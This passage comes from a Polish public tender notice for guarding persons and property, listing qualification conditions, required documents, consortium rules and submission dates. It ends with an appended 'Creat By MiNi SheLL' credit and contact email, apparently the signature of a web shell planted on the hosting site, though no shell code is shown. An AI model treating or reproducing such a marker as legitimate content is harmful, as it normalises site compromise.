spełniony, jeżeli wykonawca posiada ważną koncesję wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2021 r. poz. 1995 z późn. zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej w zakresie o którym mowa powyżej zostanie uznany za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada ww. uprawnienia i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>c)	sytuacji ekonomicznej lub finansowej: zamawiający nie stawia warunku w powyższym zakresie;<br/>d)	zdolności technicznej lub zawodowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie lub jest w trakcie wykonywania należycie co najmniej 2 zamówień polegających na świadczeniu bezpośredniej usługi ochrony osób i mienia przy jednoczesnym zastrzeżeniu, że każde <br/>z zamówień świadczone było/jest:<br/>- o wartości co najmniej dla:<br/>•	części I: 300 000,00 zł brutto,<br/>•	części II: 300 000,00 zł brutto.<br/>- dla jednego odbiorcy przez okres co najmniej jednego roku,<br/>- w obrębie jednej lokalizacji, <br/>- w obiektach użyteczności publicznej i w ich otoczeniu w rozumieniu przepisów rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2022 r. poz. 1225 z późn. zm.), z wyłączeniem obiektów takich jak: hale targowe, produkcyjne i magazynowe, dworce, obiekty widowiskowo-sportowe, baseny, hale sportowe.<br/>Zamawiający zastrzega, że w sytuacji składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy wykonawca będzie polegał na zasobach innego podmiotu na zasadach określonych w art. 118 ustawy warunek, o którym mowa powyżej, musi zostać spełniony w całości przez wykonawcę (jednego z wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/>W przypadku, gdy wykonawca powołuje się na doświadczenie nabyte w ramach zamówienia zrealizowanego przez wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (konsorcjum), zamawiający nie dopuszcza, by wykonawca wykazywał doświadczenie grupy wykonawców, której był członkiem, jeżeli faktycznie <br/>i konkretnie nie wykonywał tego zamówienia.<br/>W przypadku składania ofert na kilka części wykonawca zobowiązany jest wykazać spełnienie ww. warunku dla każdej z części z osobna, tj. wykonawca nie może wykazywać się wykonaniem tego samego zamówienia w stosunku do więcej niż jednej części. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	informacji z Krajowego Rejestru Karnego w zakresie;<br/>- art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, odnośnie orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, <br/> - art. 109 ust. 1 pkt 2 lit. a ustawy Pzp,<br/> - art. 109 ust. 1 pkt 2 lit. b ustawy, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu,<br/>- art. 109 ust. 1 pkt 3 ustawy, dotyczącej skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzono karę aresztu,<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast informacji z Krajowego Rejestru Karnego, o którym mowa w pkt a, składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu, lub gdy dokument ten nie odnosi się do wszystkich przypadków, o których mowa w pkt a, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy - wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>b)	oświadczenia wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - sporządzonego wg wzoru stanowiącego załącznik nr 4 do SWZ,<br/>c)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie podstaw wykluczenia z postępowania określonych w: <br/>- art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>- art. 108 ust. 1 pkt 4 ustawy Pzp odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>- art. 108 ust. 1 pkt 5 ustawy Pzp odnośnie do zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>- art. 108 ust. 1 pkt 6 ustawy Pzp, <br/> - art. 109 ust. 1 pkt 2 lit. b ustawy Pzp, dotyczących ukarania za wykroczenie, za które wymierzono karę ograniczenia wolności lub karę grzywny,<br/>- art. 109 ust. 1 pkt 2 lit. c ustawy Pzp,<br/>- art. 109 ust. 1 pkt 3 ustawy Pzp, dotyczących ukarania za wykroczenie, za które wymierzono karę ograniczenia wolności lub karę grzywny,<br/>- art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022,<br/>sporządzonego wg wzoru stanowiącego załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- aktualna koncesja udzielonej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia<br/><br/>- wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – wg załącznika nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	pełnomocnictwo – jeżeli dotyczy,<br/>b)	dokument stwierdzający ustanowienie przez wykonawców wspólnie ubiegających się o zamówienie, pełnomocnika do reprezentowaniu ich do udziału w przedmiotowym postępowaniu, <br/>c)	oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy w przypadku wykonawców wspólnie ubiegających się o zamówienie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą występować jako: <br/>a)	spółka cywilna – w rozumieniu przepisów art. 860-875 KC, <br/>b)	konsorcjum dwóch lub więcej wykonawców.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy złożyć wraz z ofertą. <br/>4.	W odniesieniu do warunku dotyczącego doświadczenia zawodowego, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których zdolności są wymagane. <br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, sporządzone wg wzoru stanowiącego załącznik nr 7 do SWZ.<br/>6.	Oświadczenie o braku podstaw wykluczenia z postępowania oraz spełnianiu warunków udziału w postępowaniu oraz podmiotowe środki dowodowe składane na okoliczność potwierdzenia braku podstaw wykluczenia składa odrębnie każdy z wykonawców wspólnie ubiegający się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Szczegółowe warunki, na których zawarte zostaną umowy w sprawie zamówienia publicznego określone zostały w projektowanych postanowieniach umowy, stanowiących załącznik nr 9 do SWZ.<br/>2.	Projektowane postanowienia umowy zostaną odpowiednio dostosowane do części, w ramach której będzie zawierana umowa.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz w zakresie wskazanym w projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi oświadczeniami lub dokumentami należy złożyć za pomocą platformy https://wug.ezamawiajacy.pl, zgodnie z instrukcją zawartą w pkt XIII SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-04 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Poprzez ustawę Pzp w niniejszym ogłoszeniu zamawiający rozumie ustawę Prawo zamówień publicznych (Dz.U. z 2024 r., poz. 1320).<br/><br/>Poprzez SWZ w niniejszym zamówienie zamawiający rozumie Specyfikację Warunków Zamówienia<br/><br/>Realizacja zamówienia w ramach każdej z części nastąpi maksymalnie przez okres 48 miesięcy. Zamawiający gwarantuje realizację zamówienia przez okres pierwszych 24 miesięcy, tj. od 1 marca 2025 r. do 28 lutego 2027 r.<br/>Realizacja zamówienia przez okres kolejnych 24 miesięcy, tj. od 1 marca 2027 r. do 28 lutego 2029 r., objęta jest prawem opcji.

Creat By MiNi SheLL
Email: jattceo@gmail.com